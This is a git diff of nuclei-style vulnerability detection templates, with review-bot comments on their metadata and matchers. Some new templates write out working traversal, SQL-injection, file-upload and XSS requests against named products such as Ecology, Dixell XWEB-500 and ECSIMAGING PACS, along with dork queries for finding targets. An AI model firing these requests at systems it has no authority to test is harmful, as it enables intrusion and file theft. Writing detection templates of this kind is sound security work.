@@ -5,8 +5,9 @@ info: author: dhiyaneshDk severity: medium description: CKAN uses the old jQuery Sparkle library which is vulnerable to DOM Based XSS. + reference: + - https://github.com/ckan/ckan/blob/b9e45e2723d4abd70fa72b16ec4a0bebc795c56b/ckan/public/base/javascript/view-filters.js#L27 tags: dom,xss - reference: https://github.com/ckan/ckan/blob/b9e45e2723d4abd70fa72b16ec4a0bebc795c56b/ckan/public/base/javascript/view-filters.js#L27 requests: - method: GET diff --git a/vulnerabilities/other/clockwatch-enterprise-rce.yaml b/vulnerabilities/other/clockwatch-enterprise-rce.yaml index f3fd22042e..20c5c15802 100644 --- a/vulnerabilities/other/clockwatch-enterprise-rce.yaml +++ b/vulnerabilities/other/clockwatch-enterprise-rce.yaml @@ -4,8 +4,9 @@ info: name: ClockWatch Enterprise RCE author: gy741 severity: critical + reference: + - https://blog.grimm-co.com/2021/07/old-dog-same-tricks.html tags: clockwatch,rce,network - reference: https://blog.grimm-co.com/2021/07/old-dog-same-tricks.html network: - inputs: @@ -13,13 +14,16 @@ network: host: - "{{Hostname}}" - - "{{Hostname}}:1001" + - "{{Host}}:1001" + matchers-condition: and matchers: + - type: word part: interactsh_protocol words: - "dns" + - type: word words: - "OK-C" diff --git a/vulnerabilities/other/coldfusion-debug-xss.yaml b/vulnerabilities/other/coldfusion-debug-xss.yaml index 2207ee9960..4de60288e2 100644 --- a/vulnerabilities/other/coldfusion-debug-xss.yaml +++ b/vulnerabilities/other/coldfusion-debug-xss.yaml 
@@ -5,7 +5,10 @@ info: author: dhiyaneshDK severity: medium description: The remote Adobe ColdFusion debug page has been left open to unauthenticated users, this could allow remote attackers to trigger a reflected cross site scripting against the visitors of the site. - reference: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml + reference: + - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml + metadata: + shodan-query: http.component:"Adobe ColdFusion" tags: adobe,coldfusion,xss requests: diff --git a/vulnerabilities/other/commax-credentials-disclosure.yaml b/vulnerabilities/other/commax-credentials-disclosure.yaml index bbce1d74c0..3c33beb354 100644 --- a/vulnerabilities/other/commax-credentials-disclosure.yaml +++ b/vulnerabilities/other/commax-credentials-disclosure.yaml @@ -5,7 +5,8 @@ info: author: gy741 severity: critical description: The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose RTSP credentials in plain-text - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php tags: commax,exposure,camera,iot requests: diff --git a/vulnerabilities/other/comtrend-password-exposure.yaml b/vulnerabilities/other/comtrend-password-exposure.yaml index 1764bf1d74..da04291a2e 100644 --- a/vulnerabilities/other/comtrend-password-exposure.yaml +++ b/vulnerabilities/other/comtrend-password-exposure.yaml 
@@ -5,8 +5,9 @@ info: author: geeknik severity: high description: A vulnerability in COMTREND ADSL Router allows remote authenticated users to execute arbitrary commands via the telnet interface, the password for this interface is leaked to unauthenticated users via the 'password.cgi' endpoint. - reference: https://www.exploit-db.com/exploits/16275 - tags: router,exposure,iot + reference: + - https://www.exploit-db.com/exploits/16275 + tags: router,exposure,iot,rce requests: - method: GET diff --git a/vulnerabilities/other/concrete-xss.yaml b/vulnerabilities/other/concrete-xss.yaml index 57ec254a12..b7833ae72e 100644 --- a/vulnerabilities/other/concrete-xss.yaml +++ b/vulnerabilities/other/concrete-xss.yaml @@ -1,15 +1,15 @@ id: concrete-xss info: - author: shifacyclewla,hackergautam - description: The Concrete CMS < 8.5.2 is vulnerable to Reflected XSS using cID parameter. name: Unauthenticated reflected XSS in preview_as_user function + author: shifacyclewla,hackergautam severity: medium - tags: concrete,xss,cms + description: The Concrete CMS < 8.5.2 is vulnerable to Reflected XSS using cID parameter. reference: - https://hackerone.com/reports/643442 - https://github.com/concrete5/concrete5/pull/7999 - https://twitter.com/JacksonHHax/status/1389222207805661187 + tags: concrete,xss,cms requests: - method: GET diff --git a/vulnerabilities/other/core-chuangtian-cloud-rce.yaml b/vulnerabilities/other/core-chuangtian-cloud-rce.yaml index 94cac428de..cab900eaf7 100644 --- a/vulnerabilities/other/core-chuangtian-cloud-rce.yaml +++ b/vulnerabilities/other/core-chuangtian-cloud-rce.yaml @@ -4,7 +4,8 @@ info: name: Core Chuangtian Cloud Desktop System RCE author: pikpikcu severity: critical - reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g + reference: + - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g tags: rce requests: 
diff --git a/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml b/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml index a098023ed9..1f0775c517 100644 --- a/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml +++ b/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml @@ -5,7 +5,8 @@ info: author: 0x_Akoko severity: high description: A vulnerability in CS-Cart allows remote unauthenticated attackers to access locally stored files and reveal their content. - reference: https://cxsecurity.com/issue/WLB-2020100100 + reference: + - https://cxsecurity.com/issue/WLB-2020100100 tags: cscart,lfi requests: diff --git a/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml b/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml index 16884d7384..72d4198957 100644 --- a/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml +++ b/vulnerabilities/other/dedecms-carbuyaction-fileinclude.yaml @@ -5,7 +5,11 @@ info: author: pikpikcu severity: high description: A vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to return the content of locally stored files via a vulnerability in the 'code' parameter. - reference: https://www.cnblogs.com/milantgh/p/3615986.html + reference: + - https://www.cnblogs.com/milantgh/p/3615986.html + metadata: + verified: true + shodan-query: http.html:"power by dedecms" || title:"dedecms" tags: dedecms requests: diff --git a/vulnerabilities/other/dedecms-membergroup-sqli.yaml b/vulnerabilities/other/dedecms-membergroup-sqli.yaml index 1adc04596d..6ab43810d6 100644 --- a/vulnerabilities/other/dedecms-membergroup-sqli.yaml +++ b/vulnerabilities/other/dedecms-membergroup-sqli.yaml 
@@ -5,7 +5,8 @@ info: author: pikpikcu severity: medium description: A vulnerability in the DedeCMS product allows remote unauthenticated users to inject arbitrary SQL statements via the 'ajax_membergroup.php' endpoint and the 'membergroup' parameter. - reference: http://www.dedeyuan.com/xueyuan/wenti/1244.html + reference: + - http://www.dedeyuan.com/xueyuan/wenti/1244.html tags: sqli,dedecms requests: diff --git a/vulnerabilities/other/dedecms-openredirect.yaml b/vulnerabilities/other/dedecms-openredirect.yaml index d00f523db7..689d98efa2 100644 --- a/vulnerabilities/other/dedecms-openredirect.yaml +++ b/vulnerabilities/other/dedecms-openredirect.yaml @@ -4,7 +4,11 @@ info: name: DedeCMS Open Redirect author: pikpikcu severity: low - reference: https://blog.csdn.net/ystyaoshengting/article/details/82734888 + reference: + - https://blog.csdn.net/ystyaoshengting/article/details/82734888 + metadata: + verified: true + shodan-query: http.html:"power by dedecms" || title:"dedecms" tags: dedecms,redirect requests: diff --git a/vulnerabilities/other/dicoogle-pacs-lfi.yaml b/vulnerabilities/other/dicoogle-pacs-lfi.yaml new file mode 100644 index 0000000000..84da5d8927 --- /dev/null +++ b/vulnerabilities/other/dicoogle-pacs-lfi.yaml @@ -0,0 +1,25 @@ +id: dicoogle-pacs-lfi + +info: + name: Dicoogle PACS 2.5.0 - Directory Traversal + author: 0x_akoko + severity: high + description: In version 2.5.0, it is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials aren't required. + reference: + - https://cxsecurity.com/issue/WLB-2018070131 + - http://www.dicoogle.com/home + tags: windows,lfi,dicoogle + +requests: + - method: GET + path: + - "{{BaseURL}}/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini" + + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and 
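Review bot: The `description` in the new dicoogle-pacs-lfi template opens with `In version 2.5.0, it is vulnerable to local file inclusion`, which never names the product and reads as a fragment when shown outside the template. `description: Dicoogle PACS 2.5.0 is vulnerable to local file inclusion, allowing an attacker to read arbitrary files the web user can access. Admin credentials are not required.` keeps the same facts. The author handle is `0x_akoko` here but `0x_Akoko` in accent-microcomputers-lfi and asanhamayesh-lfi above; one spelling should be used.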
diff --git a/vulnerabilities/other/dixell-xweb500-filewrite.yaml b/vulnerabilities/other/dixell-xweb500-filewrite.yaml new file mode 100644 index 0000000000..5cfb5554ca --- /dev/null +++ b/vulnerabilities/other/dixell-xweb500-filewrite.yaml @@ -0,0 +1,36 @@ +id: dixell-xweb500-filewrite + +info: + name: Dixell XWEB-500 - Arbitrary File Write + author: hackerarpan + severity: critical + reference: + - https://www.exploit-db.com/exploits/50639 + metadata: + google-dork: inurl:"xweb500.cgi" + tags: lfw,iot,dixell,xweb500 + +requests: + - raw: + - | + POST /cgi-bin/logo_extra_upload.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/octet-stream + + {{randstr}}.txt + dixell-xweb500-filewrite + + - | + GET /logo/{{randstr}}.txt HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains(body_2, "dixell-xweb500-filewrite")' + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/dlink-850L-info-leak.yaml b/vulnerabilities/other/dlink-850L-info-leak.yaml index 6d3d77235f..72ba853f9f 100644 --- a/vulnerabilities/other/dlink-850L-info-leak.yaml +++ b/vulnerabilities/other/dlink-850L-info-leak.yaml @@ -4,7 +4,8 @@ info: name: Dlink Dir-850L Info Leak author: pikpikcu severity: info - reference: https://xz.aliyun.com/t/2941 + reference: + - https://xz.aliyun.com/t/2941 tags: dlink requests: diff --git a/vulnerabilities/other/dss-download-fileread.yaml b/vulnerabilities/other/dss-download-fileread.yaml new file mode 100644 index 0000000000..732b472466 --- /dev/null +++ b/vulnerabilities/other/dss-download-fileread.yaml 
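Review bot: The new dixell-xweb500-filewrite template has no `description`, and that matters more than usual here because the check is not read-only: the first request uploads `{{randstr}}.txt` through `logo_extra_upload.cgi` and the second confirms it is served from `/logo/`, so every positive run (and every partial one) leaves a file on the device that nothing in the template removes. Operators triaging the result need to know that artifact exists and where it is; a line such as `description: Dixell XWEB-500 allows arbitrary file write via logo_extra_upload.cgi. This template writes a randomly named .txt file under /logo/ on the target, which should be removed after testing.` would cover it. `severity: critical` with no `classification` block is also out of step with the other new templates in this batch.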
@@ -0,0 +1,24 @@ +id: dss-download-fileread + +info: + name: DSS Download File Read + author: ritikchaddha + severity: high + tags: lfi,dss,lfr + +requests: + - method: GET + path: + - "{{BaseURL}}/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/duomicms-sql-injection.yaml b/vulnerabilities/other/duomicms-sql-injection.yaml index 93da2eb742..4b5cbee41c 100644 --- a/vulnerabilities/other/duomicms-sql-injection.yaml +++ b/vulnerabilities/other/duomicms-sql-injection.yaml @@ -4,7 +4,8 @@ info: name: DuomiCMS SQL Injection author: pikpikcu severity: high - reference: https://redn3ck.github.io/2016/11/01/duomiCMS/ + reference: + - https://redn3ck.github.io/2016/11/01/duomiCMS/ tags: duomicms,sqli requests: diff --git a/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml b/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml index 3ebe236378..61101d9fa7 100644 --- a/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml +++ b/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml @@ -1,8 +1,11 @@ id: ecology-filedownload-directory-traversal + info: name: Ecology Directory Traversal author: princechaddha severity: medium + metadata: + fofa-query: app="泛微-协同办公OA" tags: ecology,lfi requests: diff --git a/vulnerabilities/other/ecology-springframework-directory-traversal.yaml b/vulnerabilities/other/ecology-springframework-directory-traversal.yaml index 54317204ee..38a7c94887 100644 --- a/vulnerabilities/other/ecology-springframework-directory-traversal.yaml +++ b/vulnerabilities/other/ecology-springframework-directory-traversal.yaml @@ -1,4 +1,5 @@ id: ecology-springframework-directory-traversal + info: name: Ecology Springframework Directory Traversal author: princechaddha 
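Review bot: The new dss-download-fileread template ships with no `description` and no `reference`, and `name: DSS Download File Read` does not identify the vendor or product, so a finding from it gives the reader nothing to act on beyond the raw path. A one-line description naming the product behind `/portal/attachment_downloadByUrlAtt.action` and a link to the advisory it was written from would let someone verify the result; if none is available, the `metadata: verified:` key that other templates in this diff use would at least signal that. The `lfr` tag also appears nowhere else in this batch, so `lfi` alone may be the intended tag.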
diff --git a/vulnerabilities/other/ecology-syncuserinfo-sqli.yaml b/vulnerabilities/other/ecology-syncuserinfo-sqli.yaml new file mode 100644 index 0000000000..7039f82f5c --- /dev/null +++ b/vulnerabilities/other/ecology-syncuserinfo-sqli.yaml @@ -0,0 +1,30 @@ +id: ecology-syncuserinfo-sqli + +info: + name: Ecology Syncuserinfo Sqli + author: ritikchaddha + severity: high + reference: + - https://www.weaver.com.cn/ + metadata: + fofa-query: app="泛微-协同办公OA" + tags: ecology,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str(98989*44313),null" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "4386499557" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/ecology-v8-sqli.yaml b/vulnerabilities/other/ecology-v8-sqli.yaml new file mode 100644 index 0000000000..5279e14a6f --- /dev/null +++ b/vulnerabilities/other/ecology-v8-sqli.yaml @@ -0,0 +1,27 @@ +id: ecology-v8-sqli + +info: + name: Ecology V8 - SQL Injection + author: ritikchaddha + severity: high + reference: + - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20V8%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html + metadata: + fofa-query: app="泛微-协同办公OA" + tags: ecology,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "474088963122" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/ecsimagingpacs-rce.yaml b/vulnerabilities/other/ecsimagingpacs-rce.yaml new file mode 100644 index 0000000000..115478ee95 --- /dev/null +++ b/vulnerabilities/other/ecsimagingpacs-rce.yaml 
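Review bot: Neither new ecology template carries a `description`, and the only `reference` in ecology-syncuserinfo-sqli is the vendor home page `https://www.weaver.com.cn/`, which documents nothing about the `SyncUserInfo.jsp` issue; ecology-v8-sqli at least links a write-up. `name: Ecology Syncuserinfo Sqli` should also follow the `Product - Issue` form used by ecology-v8-sqli, e.g. `name: Ecology SyncUserInfo - SQL Injection`. The arithmetic oracles are consistent (98989*44313 = 4386499557 and 547653*865674 = 474088963122), so the matchers themselves look correct.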
@@ -0,0 +1,30 @@ +id: ecsimagingpacs-rce + +info: + name: ECSIMAGING PACS <= 6.21.5 - Command Execution and Local File Inclusion + author: ritikchaddha + severity: critical + description: ECSIMAGING PACS Application 6.21.5 and below suffer from a command injection vulnerability and a local file include vulnerability. The 'file' parameter on the page /showfile.php can be exploited to perform command execution or local file inclusion. Often on ECSIMAGING PACS, the www-data user has sudo NOPASSWD access. + reference: https://www.exploit-db.com/exploits/49388 + metadata: + verified: false + tags: ecsimagingpacs,rce + classification: + cwe-id: CWE-78 + +requests: + - method: GET + path: + - "{{BaseURL}}/showfile.php?file=/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by cs 05/12/2022 diff --git a/vulnerabilities/other/eibiz-lfi.yaml b/vulnerabilities/other/eibiz-lfi.yaml index d52df2905e..5ba1f5f9d8 100644 --- a/vulnerabilities/other/eibiz-lfi.yaml +++ b/vulnerabilities/other/eibiz-lfi.yaml @@ -5,7 +5,8 @@ info: author: 0x_akoko severity: high description: An unauthenticated remote attacker can exploit this to view the contents of files located outside of the server's root directory. The issue can be triggered through the oldfile GET parameter. - reference: https://packetstormsecurity.com/files/158943/Eibiz-i-Media-Server-Digital-Signage-3.8.0-File-Path-Traversal.html + reference: + - https://packetstormsecurity.com/files/158943/Eibiz-i-Media-Server-Digital-Signage-3.8.0-File-Path-Traversal.html tags: windows,lfi,eibiz requests: diff --git a/vulnerabilities/other/empirecms-xss.yaml b/vulnerabilities/other/empirecms-xss.yaml index 9ccb638846..edc848b882 100644 --- a/vulnerabilities/other/empirecms-xss.yaml +++ b/vulnerabilities/other/empirecms-xss.yaml 
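Review bot: `reference: https://www.exploit-db.com/exploits/49388` in the new ecsimagingpacs-rce template is a plain scalar, while every other hunk in this diff converts `reference` to a list (`reference:` followed by `- https://...`); a file being added under that convention should follow it. `classification` also sits after `tags`, unlike the other templates here which place it before `tags`, and it carries only `cwe-id: CWE-78` with no vector or score even though `severity: critical` is asserted and `metadata` says `verified: false`. Adding the CVSS metrics, or verifying the template and flipping that flag, would make the critical rating reviewable.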
@@ -4,10 +4,10 @@ info: name: EmpireCMS v75 XSS author: pikpikcu severity: medium - reference: https://www.geek-share.com/detail/2777280260.html + reference: + - https://www.geek-share.com/detail/2777280260.html tags: empirecms,xss - requests: - method: GET path: diff --git a/vulnerabilities/other/erp-nc-directory-traversal.yaml b/vulnerabilities/other/erp-nc-directory-traversal.yaml index c5d6ef641e..1bbf80ae2c 100644 --- a/vulnerabilities/other/erp-nc-directory-traversal.yaml +++ b/vulnerabilities/other/erp-nc-directory-traversal.yaml @@ -4,7 +4,8 @@ info: name: ERP-NC directory traversal author: pikpikcu severity: high - reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g + reference: + - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g tags: lfi,erp-nc requests: diff --git a/vulnerabilities/other/etouch-v2-sqli.yaml b/vulnerabilities/other/etouch-v2-sqli.yaml index 963398de58..4983e47bcb 100644 --- a/vulnerabilities/other/etouch-v2-sqli.yaml +++ b/vulnerabilities/other/etouch-v2-sqli.yaml @@ -1,12 +1,13 @@ id: etouch-v2-sqli + info: name: Ectouch v2 SQL Injection author: princechaddha severity: high - tags: etouch,sqli reference: - https://github.com/mstxq17/CodeCheck/ - https://www.anquanke.com/post/id/168991 + tags: etouch,sqli requests: - method: GET diff --git a/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml b/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml index 60ae8e5789..d52ba57f9e 100644 --- a/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml +++ b/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml 
@@ -5,7 +5,8 @@ info: author: pikpikcu severity: high description: A vulnerability in EWEBS's 'casmain.xgi' endpoint allows remote attackers to disclose the content of locally stored files via the 'Language_S' parameter. - reference: http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%9E%81%E9%80%9AEWEBS/%E6%9E%81%E9%80%9AEWEBS%20casmain.xgi%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html + reference: + - http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%9E%81%E9%80%9AEWEBS/%E6%9E%81%E9%80%9AEWEBS%20casmain.xgi%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html tags: ewebs,lfi requests: diff --git a/vulnerabilities/other/eyelock-nano-lfd.yaml b/vulnerabilities/other/eyelock-nano-lfd.yaml index c6c41baad6..483437d4b9 100644 --- a/vulnerabilities/other/eyelock-nano-lfd.yaml +++ b/vulnerabilities/other/eyelock-nano-lfd.yaml @@ -1,11 +1,13 @@ id: eyelock-nano-lfd info: - name: EyeLock nano NXT 3.5 - Local File Disclosure + name: EyeLock nano NXT 3.5 - Arbitrary File Retrieval author: geeknik severity: high - description: nano NXT suffers from a file disclosure vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources. - reference: https://www.zeroscience.mk/codes/eyelock_lfd.txt + description: EyeLock nano NXT suffers from a file retrieval vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This + can be exploited to disclose contents of files from local resources. + reference: + - https://www.zeroscience.mk/codes/eyelock_lfd.txt tags: iot,lfi,eyelock requests: @@ -22,3 +24,5 @@ requests: regex: - "root:[x*]:0:0:" part: body + +# Enhanced by mp on 2022/04/08 
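Review bot: The re-wrapped `description` in eyelock-nano-lfd is a plain scalar continued on a second line (`... This` / `can be exploited ...`), which YAML joins with a single space only because the continuation is indented past the key; a `>-` block scalar states that folding explicitly and survives re-indentation by formatters. The same wrapping appears in fatpipe-auth-bypass, goip-1-lfi, jinfornet-jreport-lfi, kevinlab-bems-backdoor and kevinlab-bems-sqli later in this commit. Indentation is collapsed in this rendering, so the continuation indent itself cannot be checked here.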
diff --git a/vulnerabilities/other/eyou-email-rce.yaml b/vulnerabilities/other/eyou-email-rce.yaml index 37cae61ecc..fe580099c6 100644 --- a/vulnerabilities/other/eyou-email-rce.yaml +++ b/vulnerabilities/other/eyou-email-rce.yaml @@ -4,7 +4,8 @@ info: name: eYou E-Mail system RCE author: pikpikcu severity: critical - reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g + reference: + - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g tags: rce,eyou requests: @@ -20,7 +21,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body - type: status diff --git a/vulnerabilities/other/fanruanoa2012-disclosure.yaml b/vulnerabilities/other/fanruanoa2012-disclosure.yaml index 56db1cbc60..5bff441836 100644 --- a/vulnerabilities/other/fanruanoa2012-disclosure.yaml +++ b/vulnerabilities/other/fanruanoa2012-disclosure.yaml @@ -3,10 +3,11 @@ id: fanruanoa2012-disclosure info: name: Fanruan Report 2012 Information Disclosure author: YanYun - description: Fanruan Report 2012 has an information disclosure vulnerability, and some sensitive information can be obtained by accessing a specific URL severity: high + description: Fanruan Report 2012 has an information disclosure vulnerability, and some sensitive information can be obtained by accessing a specific URL + reference: + - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%202012%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html tags: oa,java,fanruan,disclosure - reference: http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%202012%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html requests: - method: GET diff --git a/vulnerabilities/other/fatpipe-auth-bypass.yaml b/vulnerabilities/other/fatpipe-auth-bypass.yaml index ff03381af1..cf2b04c028 100644 --- a/vulnerabilities/other/fatpipe-auth-bypass.yaml 
+++ b/vulnerabilities/other/fatpipe-auth-bypass.yaml @@ -4,7 +4,8 @@ info: name: FatPipe Networks WARP 10.2.2 Authorization Bypass author: gy741 severity: high - description: Improper access control occurs when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources behind protected pages. + description: Improper access control occurs when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources + behind protected pages. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5682.php - https://www.fatpipeinc.com/support/advisories.php diff --git a/vulnerabilities/other/feifeicms-lfr.yaml b/vulnerabilities/other/feifeicms-lfr.yaml index 783816ccf2..4a074e68dc 100644 --- a/vulnerabilities/other/feifeicms-lfr.yaml +++ b/vulnerabilities/other/feifeicms-lfr.yaml @@ -1,12 +1,13 @@ id: feifeicms-lfr + info: name: FeiFeiCms Local File Read author: princechaddha severity: high - tags: feifeicms,lfi reference: - https://www.cnblogs.com/jinqi520/p/10202615.html - https://gitee.com/daicuo/feifeicms + tags: feifeicms,lfi requests: - method: GET diff --git a/vulnerabilities/other/finereport-path-traversal.yaml b/vulnerabilities/other/finereport-path-traversal.yaml index fb923ced76..0ebcfd9014 100644 --- a/vulnerabilities/other/finereport-path-traversal.yaml +++ b/vulnerabilities/other/finereport-path-traversal.yaml @@ -4,7 +4,8 @@ info: name: FineReport 8.0 Path Traversal author: pikpikcu severity: medium - reference: http://foreversong.cn/archives/1378 + reference: + - http://foreversong.cn/archives/1378 tags: finereport,lfi requests: diff --git a/vulnerabilities/other/flir-path-traversal.yaml b/vulnerabilities/other/flir-path-traversal.yaml index 596e30a0de..6564db13b2 100644 --- a/vulnerabilities/other/flir-path-traversal.yaml 
+++ b/vulnerabilities/other/flir-path-traversal.yaml @@ -4,7 +4,8 @@ info: name: Flir Path Traversal author: pikpikcu severity: high - reference: https://juejin.cn/post/6961370156484263972 + reference: + - https://juejin.cn/post/6961370156484263972 tags: flir,lfi requests: @@ -17,7 +18,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" condition: and - type: status diff --git a/vulnerabilities/other/geovision-geowebserver-lfi.yaml b/vulnerabilities/other/geovision-geowebserver-lfi.yaml index c0e7dbfcad..08261363a2 100644 --- a/vulnerabilities/other/geovision-geowebserver-lfi.yaml +++ b/vulnerabilities/other/geovision-geowebserver-lfi.yaml @@ -5,7 +5,8 @@ info: author: madrobot severity: high description: A vulnerability in GeoVision Geowebserver allows remote unauthenticated attackers to disclose the content of locally stored files. - reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt + reference: + - https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt tags: geowebserver,lfi requests: diff --git a/vulnerabilities/other/geovision-geowebserver-xss.yaml b/vulnerabilities/other/geovision-geowebserver-xss.yaml index a047ed5e8b..48221d3663 100644 --- a/vulnerabilities/other/geovision-geowebserver-xss.yaml +++ b/vulnerabilities/other/geovision-geowebserver-xss.yaml @@ -5,7 +5,8 @@ info: author: madrobot severity: medium description: GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests. - reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt + reference: + - https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt tags: geowebserver,xss requests: 
diff --git a/vulnerabilities/other/global-domains-lfi.yaml b/vulnerabilities/other/global-domains-lfi.yaml new file mode 100644 index 0000000000..a7d542d48b --- /dev/null +++ b/vulnerabilities/other/global-domains-lfi.yaml @@ -0,0 +1,25 @@ +id: global-domains-lfi + +info: + name: Global Domains International Directory traversal Vulnerability + author: 0x_Akoko + severity: high + reference: + - https://cxsecurity.com/issue/WLB-2018020247 + - http://www.nic.ws + tags: globaldomains,lfi,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/global-domains-xss.yaml b/vulnerabilities/other/global-domains-xss.yaml new file mode 100644 index 0000000000..c842000e15 --- /dev/null +++ b/vulnerabilities/other/global-domains-xss.yaml @@ -0,0 +1,30 @@ +id: global-domains-xss + +info: + name: Global Domains International XSS + author: princechaddha + severity: medium + reference: + - https://cxsecurity.com/issue/WLB-2018020247 + tags: globaldomains,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/gnuboard-sms-xss.yaml b/vulnerabilities/other/gnuboard-sms-xss.yaml new file mode 100644 index 0000000000..155dea7f7d --- /dev/null +++ b/vulnerabilities/other/gnuboard-sms-xss.yaml 
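Review bot: The passwd regex in the new global-domains-lfi template is `root:[x*]:0:0` without the trailing colon, while this same commit changes the existing templates to `root:.*:0:0:`, presumably to anchor the end of the gid field; the new template should use `- "root:[x*]:0:0:"` so the commit does not introduce the pattern it is removing elsewhere. groupoffice-lfi and jinfornet-jreport-lfi, also new in this commit, carry the same unanchored regex. The vendor homepage `http://www.nic.ws` listed under `reference` is not a vulnerability reference and reads better under `metadata` if it is meant as a product link.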
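Review bot: As rendered here, the body `word` matcher in global-domains-xss is an empty string (`words: - ""`), which nuclei matches against every response body, so the `and` condition collapses to content-type plus status and the template would fire on any HTML page returning 200. If the reflected marker was stripped when this page was rendered, disregard this; otherwise the matcher needs the string the request expects to see reflected, or the template should not be merged. java-melody-xss in this commit shows the same empty `words: - ''`.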
